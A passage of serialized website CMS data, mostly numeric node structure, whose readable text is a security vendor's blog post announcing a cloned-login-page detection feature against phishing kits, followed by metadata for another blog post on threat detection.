ype":173,"value":157374,"marks":210735,"data":210737},[210736],{"type":370},{},{"nodeType":173,"value":157379,"marks":210739,"data":210740},[],{},{"nodeType":254,"data":210742,"content":210743},{},[210744],{"nodeType":178,"data":210745,"content":210746},{},[210747,210751],{"nodeType":173,"value":157389,"marks":210748,"data":210750},[210749],{"type":370},{},{"nodeType":173,"value":157394,"marks":210752,"data":210753},[],{},{"nodeType":178,"data":210755,"content":210756},{},[210757],{"nodeType":173,"value":183905,"marks":210758,"data":210759},[],{},{"nodeType":250,"data":210761,"content":210762},{},[210763,210779,210795,210808],{"nodeType":254,"data":210764,"content":210765},{},[210766],{"nodeType":178,"data":210767,"content":210768},{},[210769,210772,210776],{"nodeType":173,"value":183918,"marks":210770,"data":210771},[],{},{"nodeType":173,"value":183922,"marks":210773,"data":210775},[210774],{"type":370},{},{"nodeType":173,"value":157428,"marks":210777,"data":210778},[],{},{"nodeType":254,"data":210780,"content":210781},{},[210782],{"nodeType":178,"data":210783,"content":210784},{},[210785,210788,210792],{"nodeType":173,"value":183936,"marks":210786,"data":210787},[],{},{"nodeType":173,"value":183940,"marks":210789,"data":210791},[210790],{"type":370},{},{"nodeType":173,"value":183945,"marks":210793,"data":210794},[],{},{"nodeType":254,"data":210796,"content":210797},{},[210798],{"nodeType":178,"data":210799,"content":210800},{},[210801,210805],{"nodeType":173,"value":183955,"marks":210802,"data":210804},[210803],{"type":370},{},{"nodeType":173,"value":183960,"marks":210806,"data":210807},[],{},{"nodeType":254,"data":210809,"content":210810},{},[210811],{"nodeType":178,"data":210812,"content":210813},{},[210814,210818],{"nodeType":173,"value":183970,"marks":210815,"data":210817},[210816],{"type":370},{},{"nodeType":173,"value":183975,"marks":210819,"data":210820},[],{},{"nodeType":178,"data":210822,"content":210823},{},[210824,210827,210831],{"nodeType":173,"value":183982,"marks":210825,"data":210826},[],{},{"nodeType":173,"value":2718,"marks":210828,"data":210830},[210829],{"type":370},{},{"nodeType":173,"value":183990,"marks":210832,"data":210833},[],{},{"nodeType":312,"data":210835,"content":210838},{"target":210836},{"sys":210837},{"id":183997,"type":317,"linkType":318},[],{"nodeType":178,"data":210840,"content":210841},{},[210842],{"nodeType":173,"value":184003,"marks":210843,"data":210844},[],{},{"nodeType":169,"data":210846,"content":210847},{},[210848],{"nodeType":173,"value":184010,"marks":210849,"data":210850},[],{},{"nodeType":178,"data":210852,"content":210853},{},[210854],{"nodeType":173,"value":184017,"marks":210855,"data":210856},[],{},{"nodeType":178,"data":210858,"content":210859},{},[210860],{"nodeType":173,"value":184024,"marks":210861,"data":210862},[],{},{"nodeType":178,"data":210864,"content":210865},{},[210866,210869,210875],{"nodeType":173,"value":184031,"marks":210867,"data":210868},[],{},{"nodeType":186,"data":210870,"content":210871},{"uri":114007},[210872],{"nodeType":173,"value":184038,"marks":210873,"data":210874},[],{},{"nodeType":173,"value":184042,"marks":210876,"data":210877},[],{},{"nodeType":169,"data":210879,"content":210880},{},[210881],{"nodeType":173,"value":71801,"marks":210882,"data":210883},[],{},{"nodeType":178,"data":210885,"content":210886},{},[210887,210890,210896],{"nodeType":173,"value":184055,"marks":210888,"data":210889},[],{},{"nodeType":186,"data":210891,"content":210892},{"uri":114457},[210893],{"nodeType":173,"value":88194,"marks":210894,"data":210895},[],{},{"nodeType":173,"value":184065,"marks":210897,"data":210898},[],{},{"items":210900},[210901,210903],{"sys":210902,"name":18399},{"id":18398},{"sys":210904,"name":509},{"id":508},{"items":210906},[210907],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":210908},{"url":2911},{"items":210910},[210911],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":210912},{"url":516},{"json":210914,"links":211284},{"nodeType":165,"data":210915,"content":210916},{},[210917,210923,210930,210937,210944,210951,210970,210977,210984,210991,210998,211005,211011,211018,211025,211062,211091,211097,211104,211110,211117,211123,211130,211137,211239,211246,211253,211259,211266],{"nodeType":312,"data":210918,"content":210922},{"target":210919},{"sys":210920},{"id":210921,"type":317,"linkType":318},"7F2YLK24QJ60w4vvuinNfV",[],{"nodeType":178,"data":210924,"content":210925},{},[210926],{"nodeType":173,"value":210927,"marks":210928,"data":210929},"We’re excited to announce the release of our cloned login page detection feature, which will be available to all customers immediately. This feature adds another layer of defense to our already-cutting edge phishing prevention capabilities, enabling security teams to protect workforce identities and shut down phishing attacks that use website cloning tools. ",[],{},{"nodeType":169,"data":210931,"content":210932},{},[210933],{"nodeType":173,"value":210934,"marks":210935,"data":210936},"It’s more important than ever to stop phishing attacks ",[],{},{"nodeType":178,"data":210938,"content":210939},{},[210940],{"nodeType":173,"value":210941,"marks":210942,"data":210943},"Phishing is the oldest trick in the cybercrime playbook, but attackers continue to devise new ways to circumvent defenses and execute successful phishing campaigns. Old-school phishing prevention solutions have tried to solve the problem by protecting the email inbox, a common (but not the only) attack vector, and blocking lists of known-bad domains. But these methods are not as effective today as they were a decade ago. ",[],{},{"nodeType":178,"data":210945,"content":210946},{},[210947],{"nodeType":173,"value":210948,"marks":210949,"data":210950},"There are a few reasons for this. When anti-phishing products were first rolled out, detecting and responding to identity attacks – phishing, credential stuffing, etc. – used to be just one possible method of initial access in quite a lengthy Kill Chain that stretched from the compromise of the user device, pivoting to internal network resources, escalating privileges, moving laterally, and finally achieving their objectives. The more actions an attacker has to perform, the more opportunities for detection, and the higher the likelihood that they’ll be caught in the act before any real, lasting damage can be caused. ",[],{},{"nodeType":178,"data":210952,"content":210953},{},[210954,210958,210966],{"nodeType":173,"value":210955,"marks":210956,"data":210957},"But today, attackers have a lot of opportunities to cause significant damage for much less effort than before through identity attacks. For example, ",[],{},{"nodeType":186,"data":210959,"content":210960},{"uri":74621},[210961],{"nodeType":173,"value":210962,"marks":210963,"data":210965},"if the goal is to compromise an app like Snowflake",[210964],{"type":194},{},{"nodeType":173,"value":210967,"marks":210968,"data":210969}," and dump the data from it, the Kill Chain is way shorter than a traditional network-based attack. And the initial layer of anti-account takeover controls are much more important in this context – there’s no margin for error. ",[],{},{"nodeType":169,"data":210971,"content":210972},{},[210973],{"nodeType":173,"value":210974,"marks":210975,"data":210976},"Why are existing controls failing?",[],{},{"nodeType":178,"data":210978,"content":210979},{},[210980],{"nodeType":173,"value":210981,"marks":210982,"data":210983},"The fact that phishing has remained a problem for so long is evidence enough that the old ways don’t work (and honestly, they never have). ",[],{},{"nodeType":178,"data":210985,"content":210986},{},[210987],{"nodeType":173,"value":210988,"marks":210989,"data":210990},"The main limitation is that for defenders to know that a URL, IP, or domain name is bad, it needs to be reported first. When are things reported? Typically after being used in an attack – so unfortunately, someone always gets hurt, and defenders are always one step behind the attackers. ",[],{},{"nodeType":178,"data":210992,"content":210993},{},[210994],{"nodeType":173,"value":210995,"marks":210996,"data":210997},"To make it harder for defenders to pre-emptively find phishing sites, attackers use a range of methods to obfuscate their phishing sites and evade the prying eyes of security teams and threat intelligence organizations. One of the methods that attackers use to make their sites appear legitimate is to create cloned login pages, which can be easily achieved using commonly available hacking tools.",[],{},{"nodeType":178,"data":210999,"content":211000},{},[211001],{"nodeType":173,"value":211002,"marks":211003,"data":211004},"Many phishing kits allow the attacker to simply copy the HTML code from a legitimate website and duplicate it on the malicious site or dynamically proxy the real site, creating a virtually identical interface that may lure users into a false sense of security when inputting their credentials.",[],{},{"nodeType":312,"data":211006,"content":211010},{"target":211007},{"sys":211008},{"id":211009,"type":317,"linkType":318},"28tFsY1XfjAmgurMiPWcbz",[],{"nodeType":169,"data":211012,"content":211013},{},[211014],{"nodeType":173,"value":211015,"marks":211016,"data":211017},"Building defense in depth against phishing attacks",[],{},{"nodeType":178,"data":211019,"content":211020},{},[211021],{"nodeType":173,"value":211022,"marks":211023,"data":211024},"At Push, our goal is to change the way the industry thinks about phishing. We're focused on building detections that are hard for attackers to bypass because the variables we detect are difficult for them to change. ",[],{},{"nodeType":178,"data":211026,"content":211027},{},[211028,211032,211039,211043,211050,211054,211059],{"nodeType":173,"value":211029,"marks":211030,"data":211031},"Push already offers controls that detect and prevent phishing attacks at different stages of the attack chain. Our ",[],{},{"nodeType":186,"data":211033,"content":211034},{"uri":75048},[211035],{"nodeType":173,"value":211036,"marks":211037,"data":211038},"AitM phishing toolkit detection",[],{},{"nodeType":173,"value":211040,"marks":211041,"data":211042}," can identify the specific phishing kits attackers are using (like Evilginx) and our ",[],{},{"nodeType":186,"data":211044,"content":211045},{"uri":9099},[211046],{"nodeType":173,"value":211047,"marks":211048,"data":211049},"SSO password protection control",[],{},{"nodeType":173,"value":211051,"marks":211052,"data":211053}," prevents employees from entering their password into any page other than the official SSO login page – ",[],{},{"nodeType":173,"value":211055,"marks":211056,"data":211058},"preventing the key user action of entering their valid credentials into a phishing site",[211057],{"type":370},{},{"nodeType":173,"value":2340,"marks":211060,"data":211061},[],{},{"nodeType":178,"data":211063,"content":211064},{},[211065,211069,211077,211080,211087],{"nodeType":173,"value":211066,"marks":211067,"data":211068},"While there are many other types of anti-phishing solutions on the market, only a ",[],{},{"nodeType":186,"data":211070,"content":211072},{"uri":211071},"https://pushsecurity.com/blog/the-web-proxy-is-dead-long-live-the-browser-extension/#id-detection-based-on-web-proxy-how-does-it-work-and-what-are-the-limitations",[211073],{"nodeType":173,"value":211074,"marks":211075,"data":211076},"browser-based agen",[],{},{"nodeType":173,"value":37,"marks":211078,"data":211079},[],{},{"nodeType":186,"data":211081,"content":211082},{"uri":211071},[211083],{"nodeType":173,"value":211084,"marks":211085,"data":211086},"t like Push",[],{},{"nodeType":173,"value":211088,"marks":211089,"data":211090}," can detect and intercept attacks at the point of impact. ",[],{},{"nodeType":312,"data":211092,"content":211096},{"target":211093},{"sys":211094},{"id":211095,"type":317,"linkType":318},"2Zbqf2O9xxChEz1bA7j22w",[],{"nodeType":178,"data":211098,"content":211099},{},[211100],{"nodeType":173,"value":211101,"marks":211102,"data":211103},"Cloned login page detection adds yet another layer of defense, by identifying the presence of a page that is trying to pass as a legitimate login page, blocking the user from entering their password and shutting down the attack.",[],{},{"nodeType":312,"data":211105,"content":211109},{"target":211106},{"sys":211107},{"id":211108,"type":317,"linkType":318},"Uk9pkktYXj9OMw7ecKoNO",[],{"nodeType":178,"data":211111,"content":211112},{},[211113],{"nodeType":173,"value":211114,"marks":211115,"data":211116},"Much like other Push features, users can simply enable cloned login detection on the Controls tab within our portal, as seen in the image below. With each of these features, Push enables users to solve for a piece of the phishing puzzle. ",[],{},{"nodeType":312,"data":211118,"content":211122},{"target":211119},{"sys":211120},{"id":211121,"type":317,"linkType":318},"3ZgZHpqqe3MDaNhnJdSdLt",[],{"nodeType":178,"data":211124,"content":211125},{},[211126],{"nodeType":173,"value":211127,"marks":211128,"data":211129},"The new feature detects fraudulent login pages designed to mimic a legitimate identity provider (IdP) login page, as well as other high-sensitivity pages. We do this by fingerprinting the page structure and resources of your legitimate login pages and monitoring for pages that are very similar. By analyzing the actual structure of the page, we can virtually eliminate false positives and deliver high fidelity alerts to your security team.",[],{},{"nodeType":178,"data":211131,"content":211132},{},[211133],{"nodeType":173,"value":211134,"marks":211135,"data":211136},"The Cloned login page detection feature can identify clones of the following legitimate IdP login and signup pages:",[],{},{"nodeType":250,"data":211138,"content":211139},{},[211140,211150,211160,211170,211180,211190,211200,211210,211220,211229],{"nodeType":254,"data":211141,"content":211142},{},[211143],{"nodeType":178,"data":211144,"content":211145},{},[211146],{"nodeType":173,"value":211147,"marks":211148,"data":211149},"Google Workspace",[],{},{"nodeType":254,"data":211151,"content":211152},{},[211153],{"nodeType":178,"data":211154,"content":211155},{},[211156],{"nodeType":173,"value":211157,"marks":211158,"data":211159},"Microsoft 365",[],{},{"nodeType":254,"data":211161,"content":211162},{},[211163],{"nodeType":178,"data":211164,"content":211165},{},[211166],{"nodeType":173,"value":211167,"marks":211168,"data":211169},"Okta",[],{},{"nodeType":254,"data":211171,"content":211172},{},[211173],{"nodeType":178,"data":211174,"content":211175},{},[211176],{"nodeType":173,"value":211177,"marks":211178,"data":211179},"JumpCloud",[],{},{"nodeType":254,"data":211181,"content":211182},{},[211183],{"nodeType":178,"data":211184,"content":211185},{},[211186],{"nodeType":173,"value":211187,"marks":211188,"data":211189},"Duo Security",[],{},{"nodeType":254,"data":211191,"content":211192},{},[211193],{"nodeType":178,"data":211194,"content":211195},{},[211196],{"nodeType":173,"value":211197,"marks":211198,"data":211199},"Ping Identity",[],{},{"nodeType":254,"data":211201,"content":211202},{},[211203],{"nodeType":178,"data":211204,"content":211205},{},[211206],{"nodeType":173,"value":211207,"marks":211208,"data":211209},"IBM Identity Provider",[],{},{"nodeType":254,"data":211211,"content":211212},{},[211213],{"nodeType":178,"data":211214,"content":211215},{},[211216],{"nodeType":173,"value":211217,"marks":211218,"data":211219},"SAP Identity Provider",[],{},{"nodeType":254,"data":211221,"content":211222},{},[211223],{"nodeType":178,"data":211224,"content":211225},{},[211226],{"nodeType":173,"value":197982,"marks":211227,"data":211228},[],{},{"nodeType":254,"data":211230,"content":211231},{},[211232],{"nodeType":178,"data":211233,"content":211234},{},[211235],{"nodeType":173,"value":211236,"marks":211237,"data":211238},"AWS",[],{},{"nodeType":178,"data":211240,"content":211241},{},[211242],{"nodeType":173,"value":211243,"marks":211244,"data":211245},"When Push detects a cloned login page, it triggers an event that you can view on the Events page within the platform. This data can be fed into a SIEM or other tool by emitting a webhook event. ",[],{},{"nodeType":178,"data":211247,"content":211248},{},[211249],{"nodeType":173,"value":211250,"marks":211251,"data":211252},"Alongside our SSO password protection and phishing toolkit detection, cloned login page detection adds another layer to our defense in depth approach. Together, these features provide comprehensive protection against phishing attacks.",[],{},{"nodeType":312,"data":211254,"content":211258},{"target":211255},{"sys":211256},{"id":211257,"type":317,"linkType":318},"5MIoDHn1R8j6VLNaeq9zLN",[],{"nodeType":169,"data":211260,"content":211261},{},[211262],{"nodeType":173,"value":211263,"marks":211264,"data":211265},"Book a demo to see it in action",[],{},{"nodeType":178,"data":211267,"content":211268},{},[211269,211273,211280],{"nodeType":173,"value":211270,"marks":211271,"data":211272},"Want to learn more? ",[],{},{"nodeType":186,"data":211274,"content":211275},{"uri":473},[211276],{"nodeType":173,"value":211277,"marks":211278,"data":211279},"Book a demo. ",[],{},{"nodeType":173,"value":211281,"marks":211282,"data":211283},"We’ll be happy to show you this feature, along with how we discover all the apps your employees are using, even the ones not behind SSO, and how we detect vulnerable identities and stop identity attacks with browser-based controls.",[],{},{"entries":211285},{"hyperlink":211286,"inline":211287,"block":211288},[],[],[211289,211297,211300,211303,211307,211310],{"sys":211290,"__typename":127689,"title":211291,"youTubeUrl":211292,"imagePlaceholder":211293},{"id":210921},"Introducing cloned login page detection with Push","https://www.youtube.com/watch?v=2eBdYr-Z5LE",{"url":211294,"width":211295,"height":211296},"https://images.ctfassets.net/y1cdw1ablpvd/1xZkalLqwHFPwBEOaRaAIl/26c021adcfec04cf3597182dd6b4a657/Screenshot_2024-08-13_at_3.36.22_PM.png",1884,1088,{"sys":211298,"__typename":15269,"type":15270,"ctaText":211299,"buttonLabel":134264,"buttonColour":15273,"buttonUrl":74693},{"id":211009},"Learn how attackers are designing AitM toolkits that can evade phishing detection controls",{"sys":211301,"__typename":15269,"type":15270,"ctaText":211302,"buttonLabel":134264,"buttonColour":72847,"buttonUrl":188},{"id":211095},"Learn how Push uses the Pyramid of Pain to create phishing detection controls that are a nightmare for attackers",{"sys":211304,"__typename":5434,"title":211305,"arcadeDemoUrl":211306,"playText":5437},{"id":211108},"Cloned login detection arcade demo","https://demo.arcade.software/NPrtRsYh8JjLH4cwG6rZ?embed",{"sys":211308,"__typename":5345,"title":207268,"caption":118,"layoutMode":118,"file":211309},{"id":211121},{"url":211294,"width":211295,"height":211296},{"sys":211311,"__typename":5345,"title":211312,"caption":211313,"layoutMode":118,"file":211314},{"id":211257},"Defense in depth cloned login page detection","Building layered detections against phishing attacks to achieve defense in depth.",{"url":211315,"width":121106,"height":211316},"https://images.ctfassets.net/y1cdw1ablpvd/4jBz9TaqSwZSFmnmsICIYb/4534ce241e6a0f2e52103a5817248df1/Defense_in_depth__4_.png",860,"content:blog:introducing-cloned-login-page-detection.json","blog/introducing-cloned-login-page-detection.json","blog/introducing-cloned-login-page-detection",{"_path":211321,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":211322,"summary":211324,"title":75144,"subtitle":118,"metaTitle":211335,"synopsis":75145,"hashTags":118,"publishedDate":75146,"slug":75147,"tagsCollection":211336,"relatedBlogPostsCollection":211342,"ogImage":212906,"authorsCollection":212908,"content":212912,"_id":213491,"_type":5439,"_source":5440,"_file":213492,"_stem":213493,"_extension":5439},"/blog/our-design-philosophy-detecting-what-matters",{"id":74493,"publishedAt":211323},"2024-08-16T12:39:31.739Z",{"json":211325},{"data":211326,"content":211327,"nodeType":165},{},[211328],{"data":211329,"content":211330,"nodeType":178},{},[211331],{"data":211332,"marks":211333,"value":211334,"nodeType":173},{},[],"This is the first blog in a short series we’re putting together about the ‘why’ behind the ‘what’ at Push. This entry is focused on threat detection: Let’s get started. ","Our approach to threat detection controls",{"items":211337},[211338,211340],{"sys":211339,"name":509},{"id":508},{"sys":211341,"name":505},{"id":504},{"items":211343},[211344,212033,212542],{"__typename":1528,"sys":211345,"content":211346,"title":184068,"synopsis":184069,"hashTags":118,"publishedDate":184070,"slug":184071,"tagsCollection":212023,"authorsCollection":212029},{"id":183305},{"json":211347},{"nodeType":165,"data":211348,"content":211349},{},[211350,211355,211361,211403,211409,211415,211428,211434,211440,211509,211515,211520,211526,211532,211545,211551,211557,211577,211597,211602,211619,211625,211631,211658,211664,211670,211675,211692,211698,211704,211710,211716,211721,211738,211744,211750,211756,211762,211767,211784,211790,211796,211801,211818,211824,211830,211836,211878,211884,211945,211958,211963,211969,211975,211981,211987,212002,212008],{"nodeType":312,"data":211351,"content":211354},{"target":211352},{"sys":211353},{"id":183314,"type":317,"linkType":318},[],{"nodeType":178,"data":211356,"content":211357},{},[211358],{"nodeType":173,"value":183320,"marks":211359,"data":211360},[],{},{"nodeType":178,"data":211362,"content":211363},{},[211364,211367,211373,211376,211382,211385,211391,211394,211400],{"nodeType":173,"value":183327,"marks":211365,"data":211366},[],{},{"nodeType":186,"data":211368,"content":211369},{"uri":183332},[211370],{"nodeType":173,"value":183335,"marks":211371,"data":211372},[],{},{"nodeType":173,"value":3107,"marks":211374,"data":211375},[],{},{"nodeType":186,"data":211377,"content":211378},{"uri":183343},[211379],{"nodeType":173,"value":183346,"marks":211380,"data":211381},[],{},{"nodeType":173,"value":3107,"marks":211383,"data":211384},[],{},{"nodeType":186,"data":211386,"content":211387},{"uri":1297},[211388],{"nodeType":173,"value":183356,"marks":211389,"data":211390},[],{},{"nodeType":173,"value":3107,"marks":211392,"data":211393},[],{},{"nodeType":186,"data":211395,"content":211396},{"uri":183364},[211397],{"nodeType":173,"value":183367,"marks":211398,"data":211399},[],{},{"nodeType":173,"value":183371,"marks":211401,"data":211402},[],{},{"nodeType":178,"data":211404,"content":211405},{},[211406],{"nodeType":173,"value":183378,"marks":211407,"data":211408},[],{},{"nodeType":178,"data":211410,"content":211411},{},[211412],{"nodeType":173,"value":183385,"marks":211413,"data":211414},[],{},{"nodeType":178,"data":211416,"content":211417},{},[211418,211421,211425],{"nodeType":173,"value":183392,"marks":211419,"data":211420},[],{},{"nodeType":173,"value":183396,"marks":211422,"data":211424},[211423],{"type":370},{},{"nodeType":173,"value":1477,"marks":211426,"data":211427},[],{},{"nodeType":178,"data":211429,"content":211430},{},[211431],{"nodeType":173,"value":183407,"marks":211432,"data":211433},[],{},{"nodeType":178,"data":211435,"content":211436},{},[211437],{"nodeType":173,"value":183414,"marks":211438,"data":211439},[],{},{"nodeType":250,"data":211441,"content":211442},{},[211443,211468],{"nodeType":254,"data":211444,"content":211445},{},[211446],{"nodeType":178,"data":211447,"content":211448},{},[211449,211453,211456,211465],{"nodeType":173,"value":183427,"marks":211450,"data":211452},[211451],{"type":370},{},{"nodeType":173,"value":183432,"marks":211454,"data":211455},[],{},{"nodeType":1698,"data":211457,"content":211460},{"target":211458},{"sys":211459},{"id":183439,"type":317,"linkType":318},[211461],{"nodeType":173,"value":18649,"marks":211462,"data":211464},[211463],{"type":370},{},{"nodeType":173,"value":183446,"marks":211466,"data":211467},[],{},{"nodeType":254,"data":211469,"content":211470},{},[211471],{"nodeType":178,"data":211472,"content":211473},{},[211474,211478,211481,211487,211490,211496,211499,211506],{"nodeType":173,"value":183456,"marks":211475,"data":211477},[211476],{"type":370},{},{"nodeType":173,"value":183461,"marks":211479,"data":211480},[],{},{"nodeType":186,"data":211482,"content":211483},{"uri":183466},[211484],{"nodeType":173,"value":183469,"marks":211485,"data":211486},[],{},{"nodeType":173,"value":2936,"marks":211488,"data":211489},[],{},{"nodeType":186,"data":211491,"content":211492},{"uri":114007},[211493],{"nodeType":173,"value":183479,"marks":211494,"data":211495},[],{},{"nodeType":173,"value":183483,"marks":211497,"data":211498},[],{},{"nodeType":186,"data":211500,"content":211501},{"uri":183488},[211502],{"nodeType":173,"value":2718,"marks":211503,"data":211505},[211504],{"type":370},{},{"nodeType":173,"value":183495,"marks":211507,"data":211508},[],{},{"nodeType":178,"data":211510,"content":211511},{},[211512],{"nodeType":173,"value":183502,"marks":211513,"data":211514},[],{},{"nodeType":312,"data":211516,"content":211519},{"target":211517},{"sys":211518},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":211521,"content":211522},{},[211523],{"nodeType":173,"value":183514,"marks":211524,"data":211525},[],{},{"nodeType":178,"data":211527,"content":211528},{},[211529],{"nodeType":173,"value":183521,"marks":211530,"data":211531},[],{},{"nodeType":178,"data":211533,"content":211534},{},[211535,211538,211542],{"nodeType":173,"value":183528,"marks":211536,"data":211537},[],{},{"nodeType":173,"value":18649,"marks":211539,"data":211541},[211540],{"type":370},{},{"nodeType":173,"value":183536,"marks":211543,"data":211544},[],{},{"nodeType":178,"data":211546,"content":211547},{},[211548],{"nodeType":173,"value":183543,"marks":211549,"data":211550},[],{},{"nodeType":235,"data":211552,"content":211553},{},[211554],{"nodeType":173,"value":24345,"marks":211555,"data":211556},[],{},{"nodeType":178,"data":211558,"content":211559},{},[211560,211563,211567,211570,211574],{"nodeType":173,"value":183556,"marks":211561,"data":211562},[],{},{"nodeType":173,"value":183560,"marks":211564,"data":211566},[211565],{"type":370},{},{"nodeType":173,"value":933,"marks":211568,"data":211569},[],{},{"nodeType":173,"value":183568,"marks":211571,"data":211573},[211572],{"type":370},{},{"nodeType":173,"value":1477,"marks":211575,"data":211576},[],{},{"nodeType":178,"data":211578,"content":211579},{},[211580,211583,211587,211590,211594],{"nodeType":173,"value":183579,"marks":211581,"data":211582},[],{},{"nodeType":173,"value":2740,"marks":211584,"data":211586},[211585],{"type":370},{},{"nodeType":173,"value":1464,"marks":211588,"data":211589},[],{},{"nodeType":173,"value":2748,"marks":211591,"data":211593},[211592],{"type":370},{},{"nodeType":173,"value":183594,"marks":211595,"data":211596},[],{},{"nodeType":312,"data":211598,"content":211601},{"target":211599},{"sys":211600},{"id":156217,"type":317,"linkType":318},[],{"nodeType":178,"data":211603,"content":211604},{},[211605,211608,211616],{"nodeType":173,"value":183606,"marks":211606,"data":211607},[],{},{"nodeType":1698,"data":211609,"content":211612},{"target":211610},{"sys":211611},{"id":2148,"type":317,"linkType":318},[211613],{"nodeType":173,"value":65996,"marks":211614,"data":211615},[],{},{"nodeType":173,"value":37,"marks":211617,"data":211618},[],{},{"nodeType":235,"data":211620,"content":211621},{},[211622],{"nodeType":173,"value":125683,"marks":211623,"data":211624},[],{},{"nodeType":178,"data":211626,"content":211627},{},[211628],{"nodeType":173,"value":183630,"marks":211629,"data":211630},[],{},{"nodeType":178,"data":211632,"content":211633},{},[211634,211637,211641,211644,211648,211651,211655],{"nodeType":173,"value":183637,"marks":211635,"data":211636},[],{},{"nodeType":173,"value":2740,"marks":211638,"data":211640},[211639],{"type":370},{},{"nodeType":173,"value":1464,"marks":211642,"data":211643},[],{},{"nodeType":173,"value":2748,"marks":211645,"data":211647},[211646],{"type":370},{},{"nodeType":173,"value":183652,"marks":211649,"data":211650},[],{},{"nodeType":173,"value":2701,"marks":211652,"data":211654},[211653],{"type":370},{},{"nodeType":173,"value":183660,"marks":211656,"data":211657},[],{},{"nodeType":178,"data":211659,"content":211660},{},[211661],{"nodeType":173,"value":183667,"marks":211662,"data":211663},[],{},{"nodeType":178,"data":211665,"content":211666},{},[211667],{"nodeType":173,"value":183674,"marks":211668,"data":211669},[],{},{"nodeType":312,"data":211671,"content":211674},{"target":211672},{"sys":211673},{"id":183681,"type":317,"linkType":318},[],{"nodeType":178,"data":211676,"content":211677},{},[211678,211681,211689],{"nodeType":173,"value":183606,"marks":211679,"data":211680},[],{},{"nodeType":1698,"data":211682,"content":211685},{"target":211683},{"sys":211684},{"id":2405,"type":317,"linkType":318},[211686],{"nodeType":173,"value":125683,"marks":211687,"data":211688},[],{},{"nodeType":173,"value":37,"marks":211690,"data":211691},[],{},{"nodeType":235,"data":211693,"content":211694},{},[211695],{"nodeType":173,"value":157048,"marks":211696,"data":211697},[],{},{"nodeType":178,"data":211699,"content":211700},{},[211701],{"nodeType":173,"value":183710,"marks":211702,"data":211703},[],{},{"nodeType":178,"data":211705,"content":211706},{},[211707],{"nodeType":173,"value":183717,"marks":211708,"data":211709},[],{},{"nodeType":178,"data":211711,"content":211712},{},[211713],{"nodeType":173,"value":183724,"marks":211714,"data":211715},[],{},{"nodeType":312,"data":211717,"content":211720},{"target":211718},{"sys":211719},{"id":183731,"type":317,"linkType":318},[],{"nodeType":178,"data":211722,"content":211723},{},[211724,211727,211735],{"nodeType":173,"value":183606,"marks":211725,"data":211726},[],{},{"nodeType":1698,"data":211728,"content":211731},{"target":211729},{"sys":211730},{"id":183743,"type":317,"linkType":318},[211732],{"nodeType":173,"value":157048,"marks":211733,"data":211734},[],{},{"nodeType":173,"value":37,"marks":211736,"data":211737},[],{},{"nodeType":235,"data":211739,"content":211740},{},[211741],{"nodeType":173,"value":183755,"marks":211742,"data":211743},[],{},{"nodeType":178,"data":211745,"content":211746},{},[211747],{"nodeType":173,"value":183762,"marks":211748,"data":211749},[],{},{"nodeType":178,"data":211751,"content":211752},{},[211753],{"nodeType":173,"value":183769,"marks":211754,"data":211755},[],{},{"nodeType":178,"data":211757,"content":211758},{},[211759],{"nodeType":173,"value":183776,"marks":211760,"data":211761},[],{},{"nodeType":312,"data":211763,"content":211766},{"target":211764},{"sys":211765},{"id":183783,"type":317,"linkType":318},[],{"nodeType":178,"data":211768,"content":211769},{},[211770,211773,211781],{"nodeType":173,"value":183606,"marks":211771,"data":211772},[],{},{"nodeType":1698,"data":211774,"content":211777},{"target":211775},{"sys":211776},{"id":114256,"type":317,"linkType":318},[211778],{"nodeType":173,"value":114259,"marks":211779,"data":211780},[],{},{"nodeType":173,"value":37,"marks":211782,"data":211783},[],{},{"nodeType":235,"data":211785,"content":211786},{},[211787],{"nodeType":173,"value":2631,"marks":211788,"data":211789},[],{},{"nodeType":178,"data":211791,"content":211792},{},[211793],{"nodeType":173,"value":183812,"marks":211794,"data":211795},[],{},{"nodeType":312,"data":211797,"content":211800},{"target":211798},{"sys":211799},{"id":183819,"type":317,"linkType":318},[],{"nodeType":178,"data":211802,"content":211803},{},[211804,211807,211815],{"nodeType":173,"value":183606,"marks":211805,"data":211806},[],{},{"nodeType":1698,"data":211808,"content":211811},{"target":211809},{"sys":211810},{"id":2466,"type":317,"linkType":318},[211812],{"nodeType":173,"value":126474,"marks":211813,"data":211814},[],{},{"nodeType":173,"value":37,"marks":211816,"data":211817},[],{},{"nodeType":169,"data":211819,"content":211820},{},[211821],{"nodeType":173,"value":183842,"marks":211822,"data":211823},[],{},{"nodeType":178,"data":211825,"content":211826},{},[211827],{"nodeType":173,"value":183849,"marks":211828,"data":211829},[],{},{"nodeType":178,"data":211831,"content":211832},{},[211833],{"nodeType":173,"value":183856,"marks":211834,"data":211835},[],{},{"nodeType":250,"data":211837,"content":211838},{},[211839,211852,211865],{"nodeType":254,"data":211840,"content":211841},{},[211842],{"nodeType":178,"data":211843,"content":211844},{},[211845,211849],{"nodeType":173,"value":157359,"marks":211846,"data":211848},[211847],{"type":370},{},{"nodeType":173,"value":157364,"marks":211850,"data":211851},[],{},{"nodeType":254,"data":211853,"content":211854},{},[211855],{"nodeType":178,"data":211856,"content":211857},{},[211858,211862],{"nodeType":173,"value":157374,"marks":211859,"data":211861},[211860],{"type":370},{},{"nodeType":173,"value":157379,"marks":211863,"data":211864},[],{},{"nodeType":254,"data":211866,"content":211867},{},[211868],{"nodeType":178,"data":211869,"content":211870},{},[211871,211875],{"nodeType":173,"value":157389,"marks":211872,"data":211874},[211873],{"type":370},{},{"nodeType":173,"value":157394,"marks":211876,"data":211877},[],{},{"nodeType":178,"data":211879,"content":211880},{},[211881],{"nodeType":173,"value":183905,"marks":211882,"data":211883},[],{},{"nodeType":250,"data":211885,"content":211886},{},[211887,211903,211919,211932],{"nodeType":254,"data":211888,"content":211889},{},[211890],{"nodeType":178,"data":211891,"content":211892},{},[211893,211896,211900],{"nodeType":173,"value":183918,"marks":211894,"data":211895},[],{},{"nodeType":173,"value":183922,"marks":211897,"data":211899},[211898],{"type":370},{},{"nodeType":173,"value":157428,"marks":211901,"data":211902},[],{},{"nodeType":254,"data":211904,"content":211905},{},[211906],{"nodeType":178,"data":211907,"content":211908},{},[211909,211912,211916],{"nodeType":173,"value":183936,"marks":211910,"data":211911},[],{},{"nodeType":173,"value":183940,"marks":211913,"data":211915},[211914],{"type":370},{},{"nodeType":173,"value":183945,"marks":211917,"data":211918},[],{},{"nodeType":254,"data":211920,"content":211921},{},[211922],{"nodeType":178,"data":211923,"content":211924},{},[211925,211929],{"